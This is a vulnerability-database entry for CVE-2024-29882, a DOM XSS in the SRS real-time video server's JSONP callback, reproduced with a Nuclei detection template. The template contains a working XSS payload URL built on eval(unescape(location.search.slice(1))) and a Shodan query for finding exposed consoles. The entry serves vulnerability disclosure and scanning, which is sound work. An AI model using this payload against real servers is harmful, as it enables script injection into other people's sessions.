CVE-2024-29882: HTTP API DOM - XSS on JSONP callback
日期: 2025-08-01 | 影响软件: 未知 | POC: 已公开
漏洞描述
SRS is a simple, high-efficiency, real-time video server. SRS's `/api/v1/vhosts/vid-<id>?callback=<payload>` endpoint didn't filter the callback function name which led to injecting malicious javascript payloads and executing XSS ( Cross-Site Scripting). This vulnerability is fixed in 5.0.210 and 6.0.121.
PoC代码[已公开]
id: CVE-2024-29882
info:
name: HTTP API DOM - XSS on JSONP callback
author: rootxharsh,iamnoooob,pdresearch
severity: high
description: |
SRS is a simple, high-efficiency, real-time video server. SRS's `/api/v1/vhosts/vid-<id>?callback=<payload>` endpoint didn't filter the callback function name which led to injecting malicious javascript payloads and executing XSS ( Cross-Site Scripting). This vulnerability is fixed in 5.0.210 and 6.0.121.
reference:
- https://github.com/ossrs/srs/commit/244ce7bc013a0b805274a65132a2980680ba6b9d
- https://github.com/ossrs/srs/security/advisories/GHSA-gv9r-qcjc-5hj7
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cve-id: CVE-2024-29882
cwe-id: CWE-79
epss-score: 0.02716
epss-percentile: 0.85389
metadata:
verified: true
max-request: 1
vendor: ossrs
product: simple_realtime_server
shodan-query: http.favicon.hash:1386054408
tags: cve,cve2023,srs,dom,xss,vuln
headless:
- steps:
- args:
url: '{{BaseURL}}/console/en_index.html?alert(document.domain)#/vhosts/vid-xsedfv%3Fcallback=eval(unescape(location.search.slice(1)))%252f%252f'
action: navigate
- action: waitdialog
name: object_dom
matchers-condition: and
matchers:
- type: dsl
dsl:
- object_dom == true
- type: word
part: body
words:
- "<title>SRS"
- "ConnectSRS</a>"
condition: or
case-insensitive: true
# digest: 4a0a0047304502210098058dddadc6ec1fbf6bf3026d4df0d910fe324c3ff2c9c727447a884dfd21730220145404c4b4e17c239e04184a57aec08089f2741c9afbc928098538753556b3ae:922c64590222798bb761d5b6d8e72950